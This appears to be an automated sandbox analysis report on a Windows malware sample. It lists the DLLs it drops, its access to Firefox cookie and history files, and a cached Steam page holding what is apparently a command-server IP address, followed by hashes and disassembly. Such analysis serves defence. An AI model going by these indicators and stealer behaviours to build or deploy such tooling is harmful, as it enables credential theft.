                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33790
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4366524849824485
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:sdpqm+0Iz3YAA9CWGtwfcDAXZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SU:sd8m+0Iz3YAA9CWGtwFXZ4VWBCW3KI8u
                                                                                                                                                                                                                                                                                                MD5:632433D44D35FF1988C3E2B8549E05CA
                                                                                                                                                                                                                                                                                                SHA1:4F55F71399E06470BA21A50149525F507B621CD7
                                                                                                                                                                                                                                                                                                SHA-256:4F62733B376F951C2E1829DC3AE3B067B27217991566C9847F2CDABA2C048974
                                                                                                                                                                                                                                                                                                SHA-512:DB32AB4E9D50ABF61868C8FA0B6ADF7B8374682930D40BA07F632747B63B292C7612DAD99074A1A7D96EDF426EED19A5FBBC84BD5DEB43FCBAE42AEC22DD934D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ve74r https://37.27.87.155|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2459136
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                                                MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                                                SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                                                SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                                                SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.542225503882471
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                                                                File size:402'432 bytes
                                                                                                                                                                                                                                                                                                MD5:b841d5f5e8102ee6ac56d565fbb58879
                                                                                                                                                                                                                                                                                                SHA1:972f4ba09920b0512769f9eb1923da2d8b0b9470
                                                                                                                                                                                                                                                                                                SHA256:e3d540df89c42080e0d44ae13d7687f5ec5dd178128cb9831eefddc742f2cf3e
                                                                                                                                                                                                                                                                                                SHA512:f565307a8bcc736c94e4eda451e58447839c3c142fd5601764f87f2b4d9734d11debd069d0822e66e2551c6c2d57f8c1123439c4dc2e7c7955b4f5248fb593de
                                                                                                                                                                                                                                                                                                SSDEEP:12288:j8DhiD2IN0wnmRsJlBza6WHAf1kNgggoCe:ehiqIN7wClMBAf+rhR
                                                                                                                                                                                                                                                                                                TLSH:1C84E015B1C08073E9A629320AF0DAB55F7DB8700BA5598F63985F7F4F306C1D722A6B
                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E\..+...+...+.B.(...+.B...;.+.B./...+.B.*...+...*...+.SN/...+.SN(...+.SN....+.bM"...+.bM)...+.Rich..+.........PE..L....x"f...

                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Entrypoint:0x405f71
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x6622780C [Fri Apr 19 13:56:28 2024 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                Import Hash:f578d161341ba8161650c97fe866d0ab

                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                call 00007F56584CEACEh
                                                                                                                                                                                                                                                                                                jmp 00007F56584CE199h
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                                                                                                                movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                                                                                                                                lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                                                                                                                                add edx, eax
                                                                                                                                                                                                                                                                                                movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                                                                                                                                imul esi, eax, 28h
                                                                                                                                                                                                                                                                                                add esi, edx
                                                                                                                                                                                                                                                                                                cmp edx, esi
                                                                                                                                                                                                                                                                                                je 00007F56584CE33Bh
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                                                                jc 00007F56584CE32Ch
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [edx+08h]
                                                                                                                                                                                                                                                                                                add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                                                                cmp ecx, eax
                                                                                                                                                                                                                                                                                                jc 00007F56584CE32Eh
                                                                                                                                                                                                                                                                                                add edx, 28h
                                                                                                                                                                                                                                                                                                cmp edx, esi
                                                                                                                                                                                                                                                                                                jne 00007F56584CE30Ch
                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                mov eax, edx
                                                                                                                                                                                                                                                                                                jmp 00007F56584CE31Bh
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                call 00007F56584CEDA5h
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007F56584CE342h
                                                                                                                                                                                                                                                                                                mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                                                                                mov esi, 00462D14h
                                                                                                                                                                                                                                                                                                mov edx, dword ptr [eax+04h]
                                                                                                                                                                                                                                                                                                jmp 00007F56584CE326h
                                                                                                                                                                                                                                                                                                cmp edx, eax
                                                                                                                                                                                                                                                                                                je 00007F56584CE332h
                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                mov ecx, edx
                                                                                                                                                                                                                                                                                                lock cmpxchg dword ptr [esi], ecx
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                jne 00007F56584CE312h
                                                                                                                                                                                                                                                                                                xor al, al
                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                mov al, 01h
                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
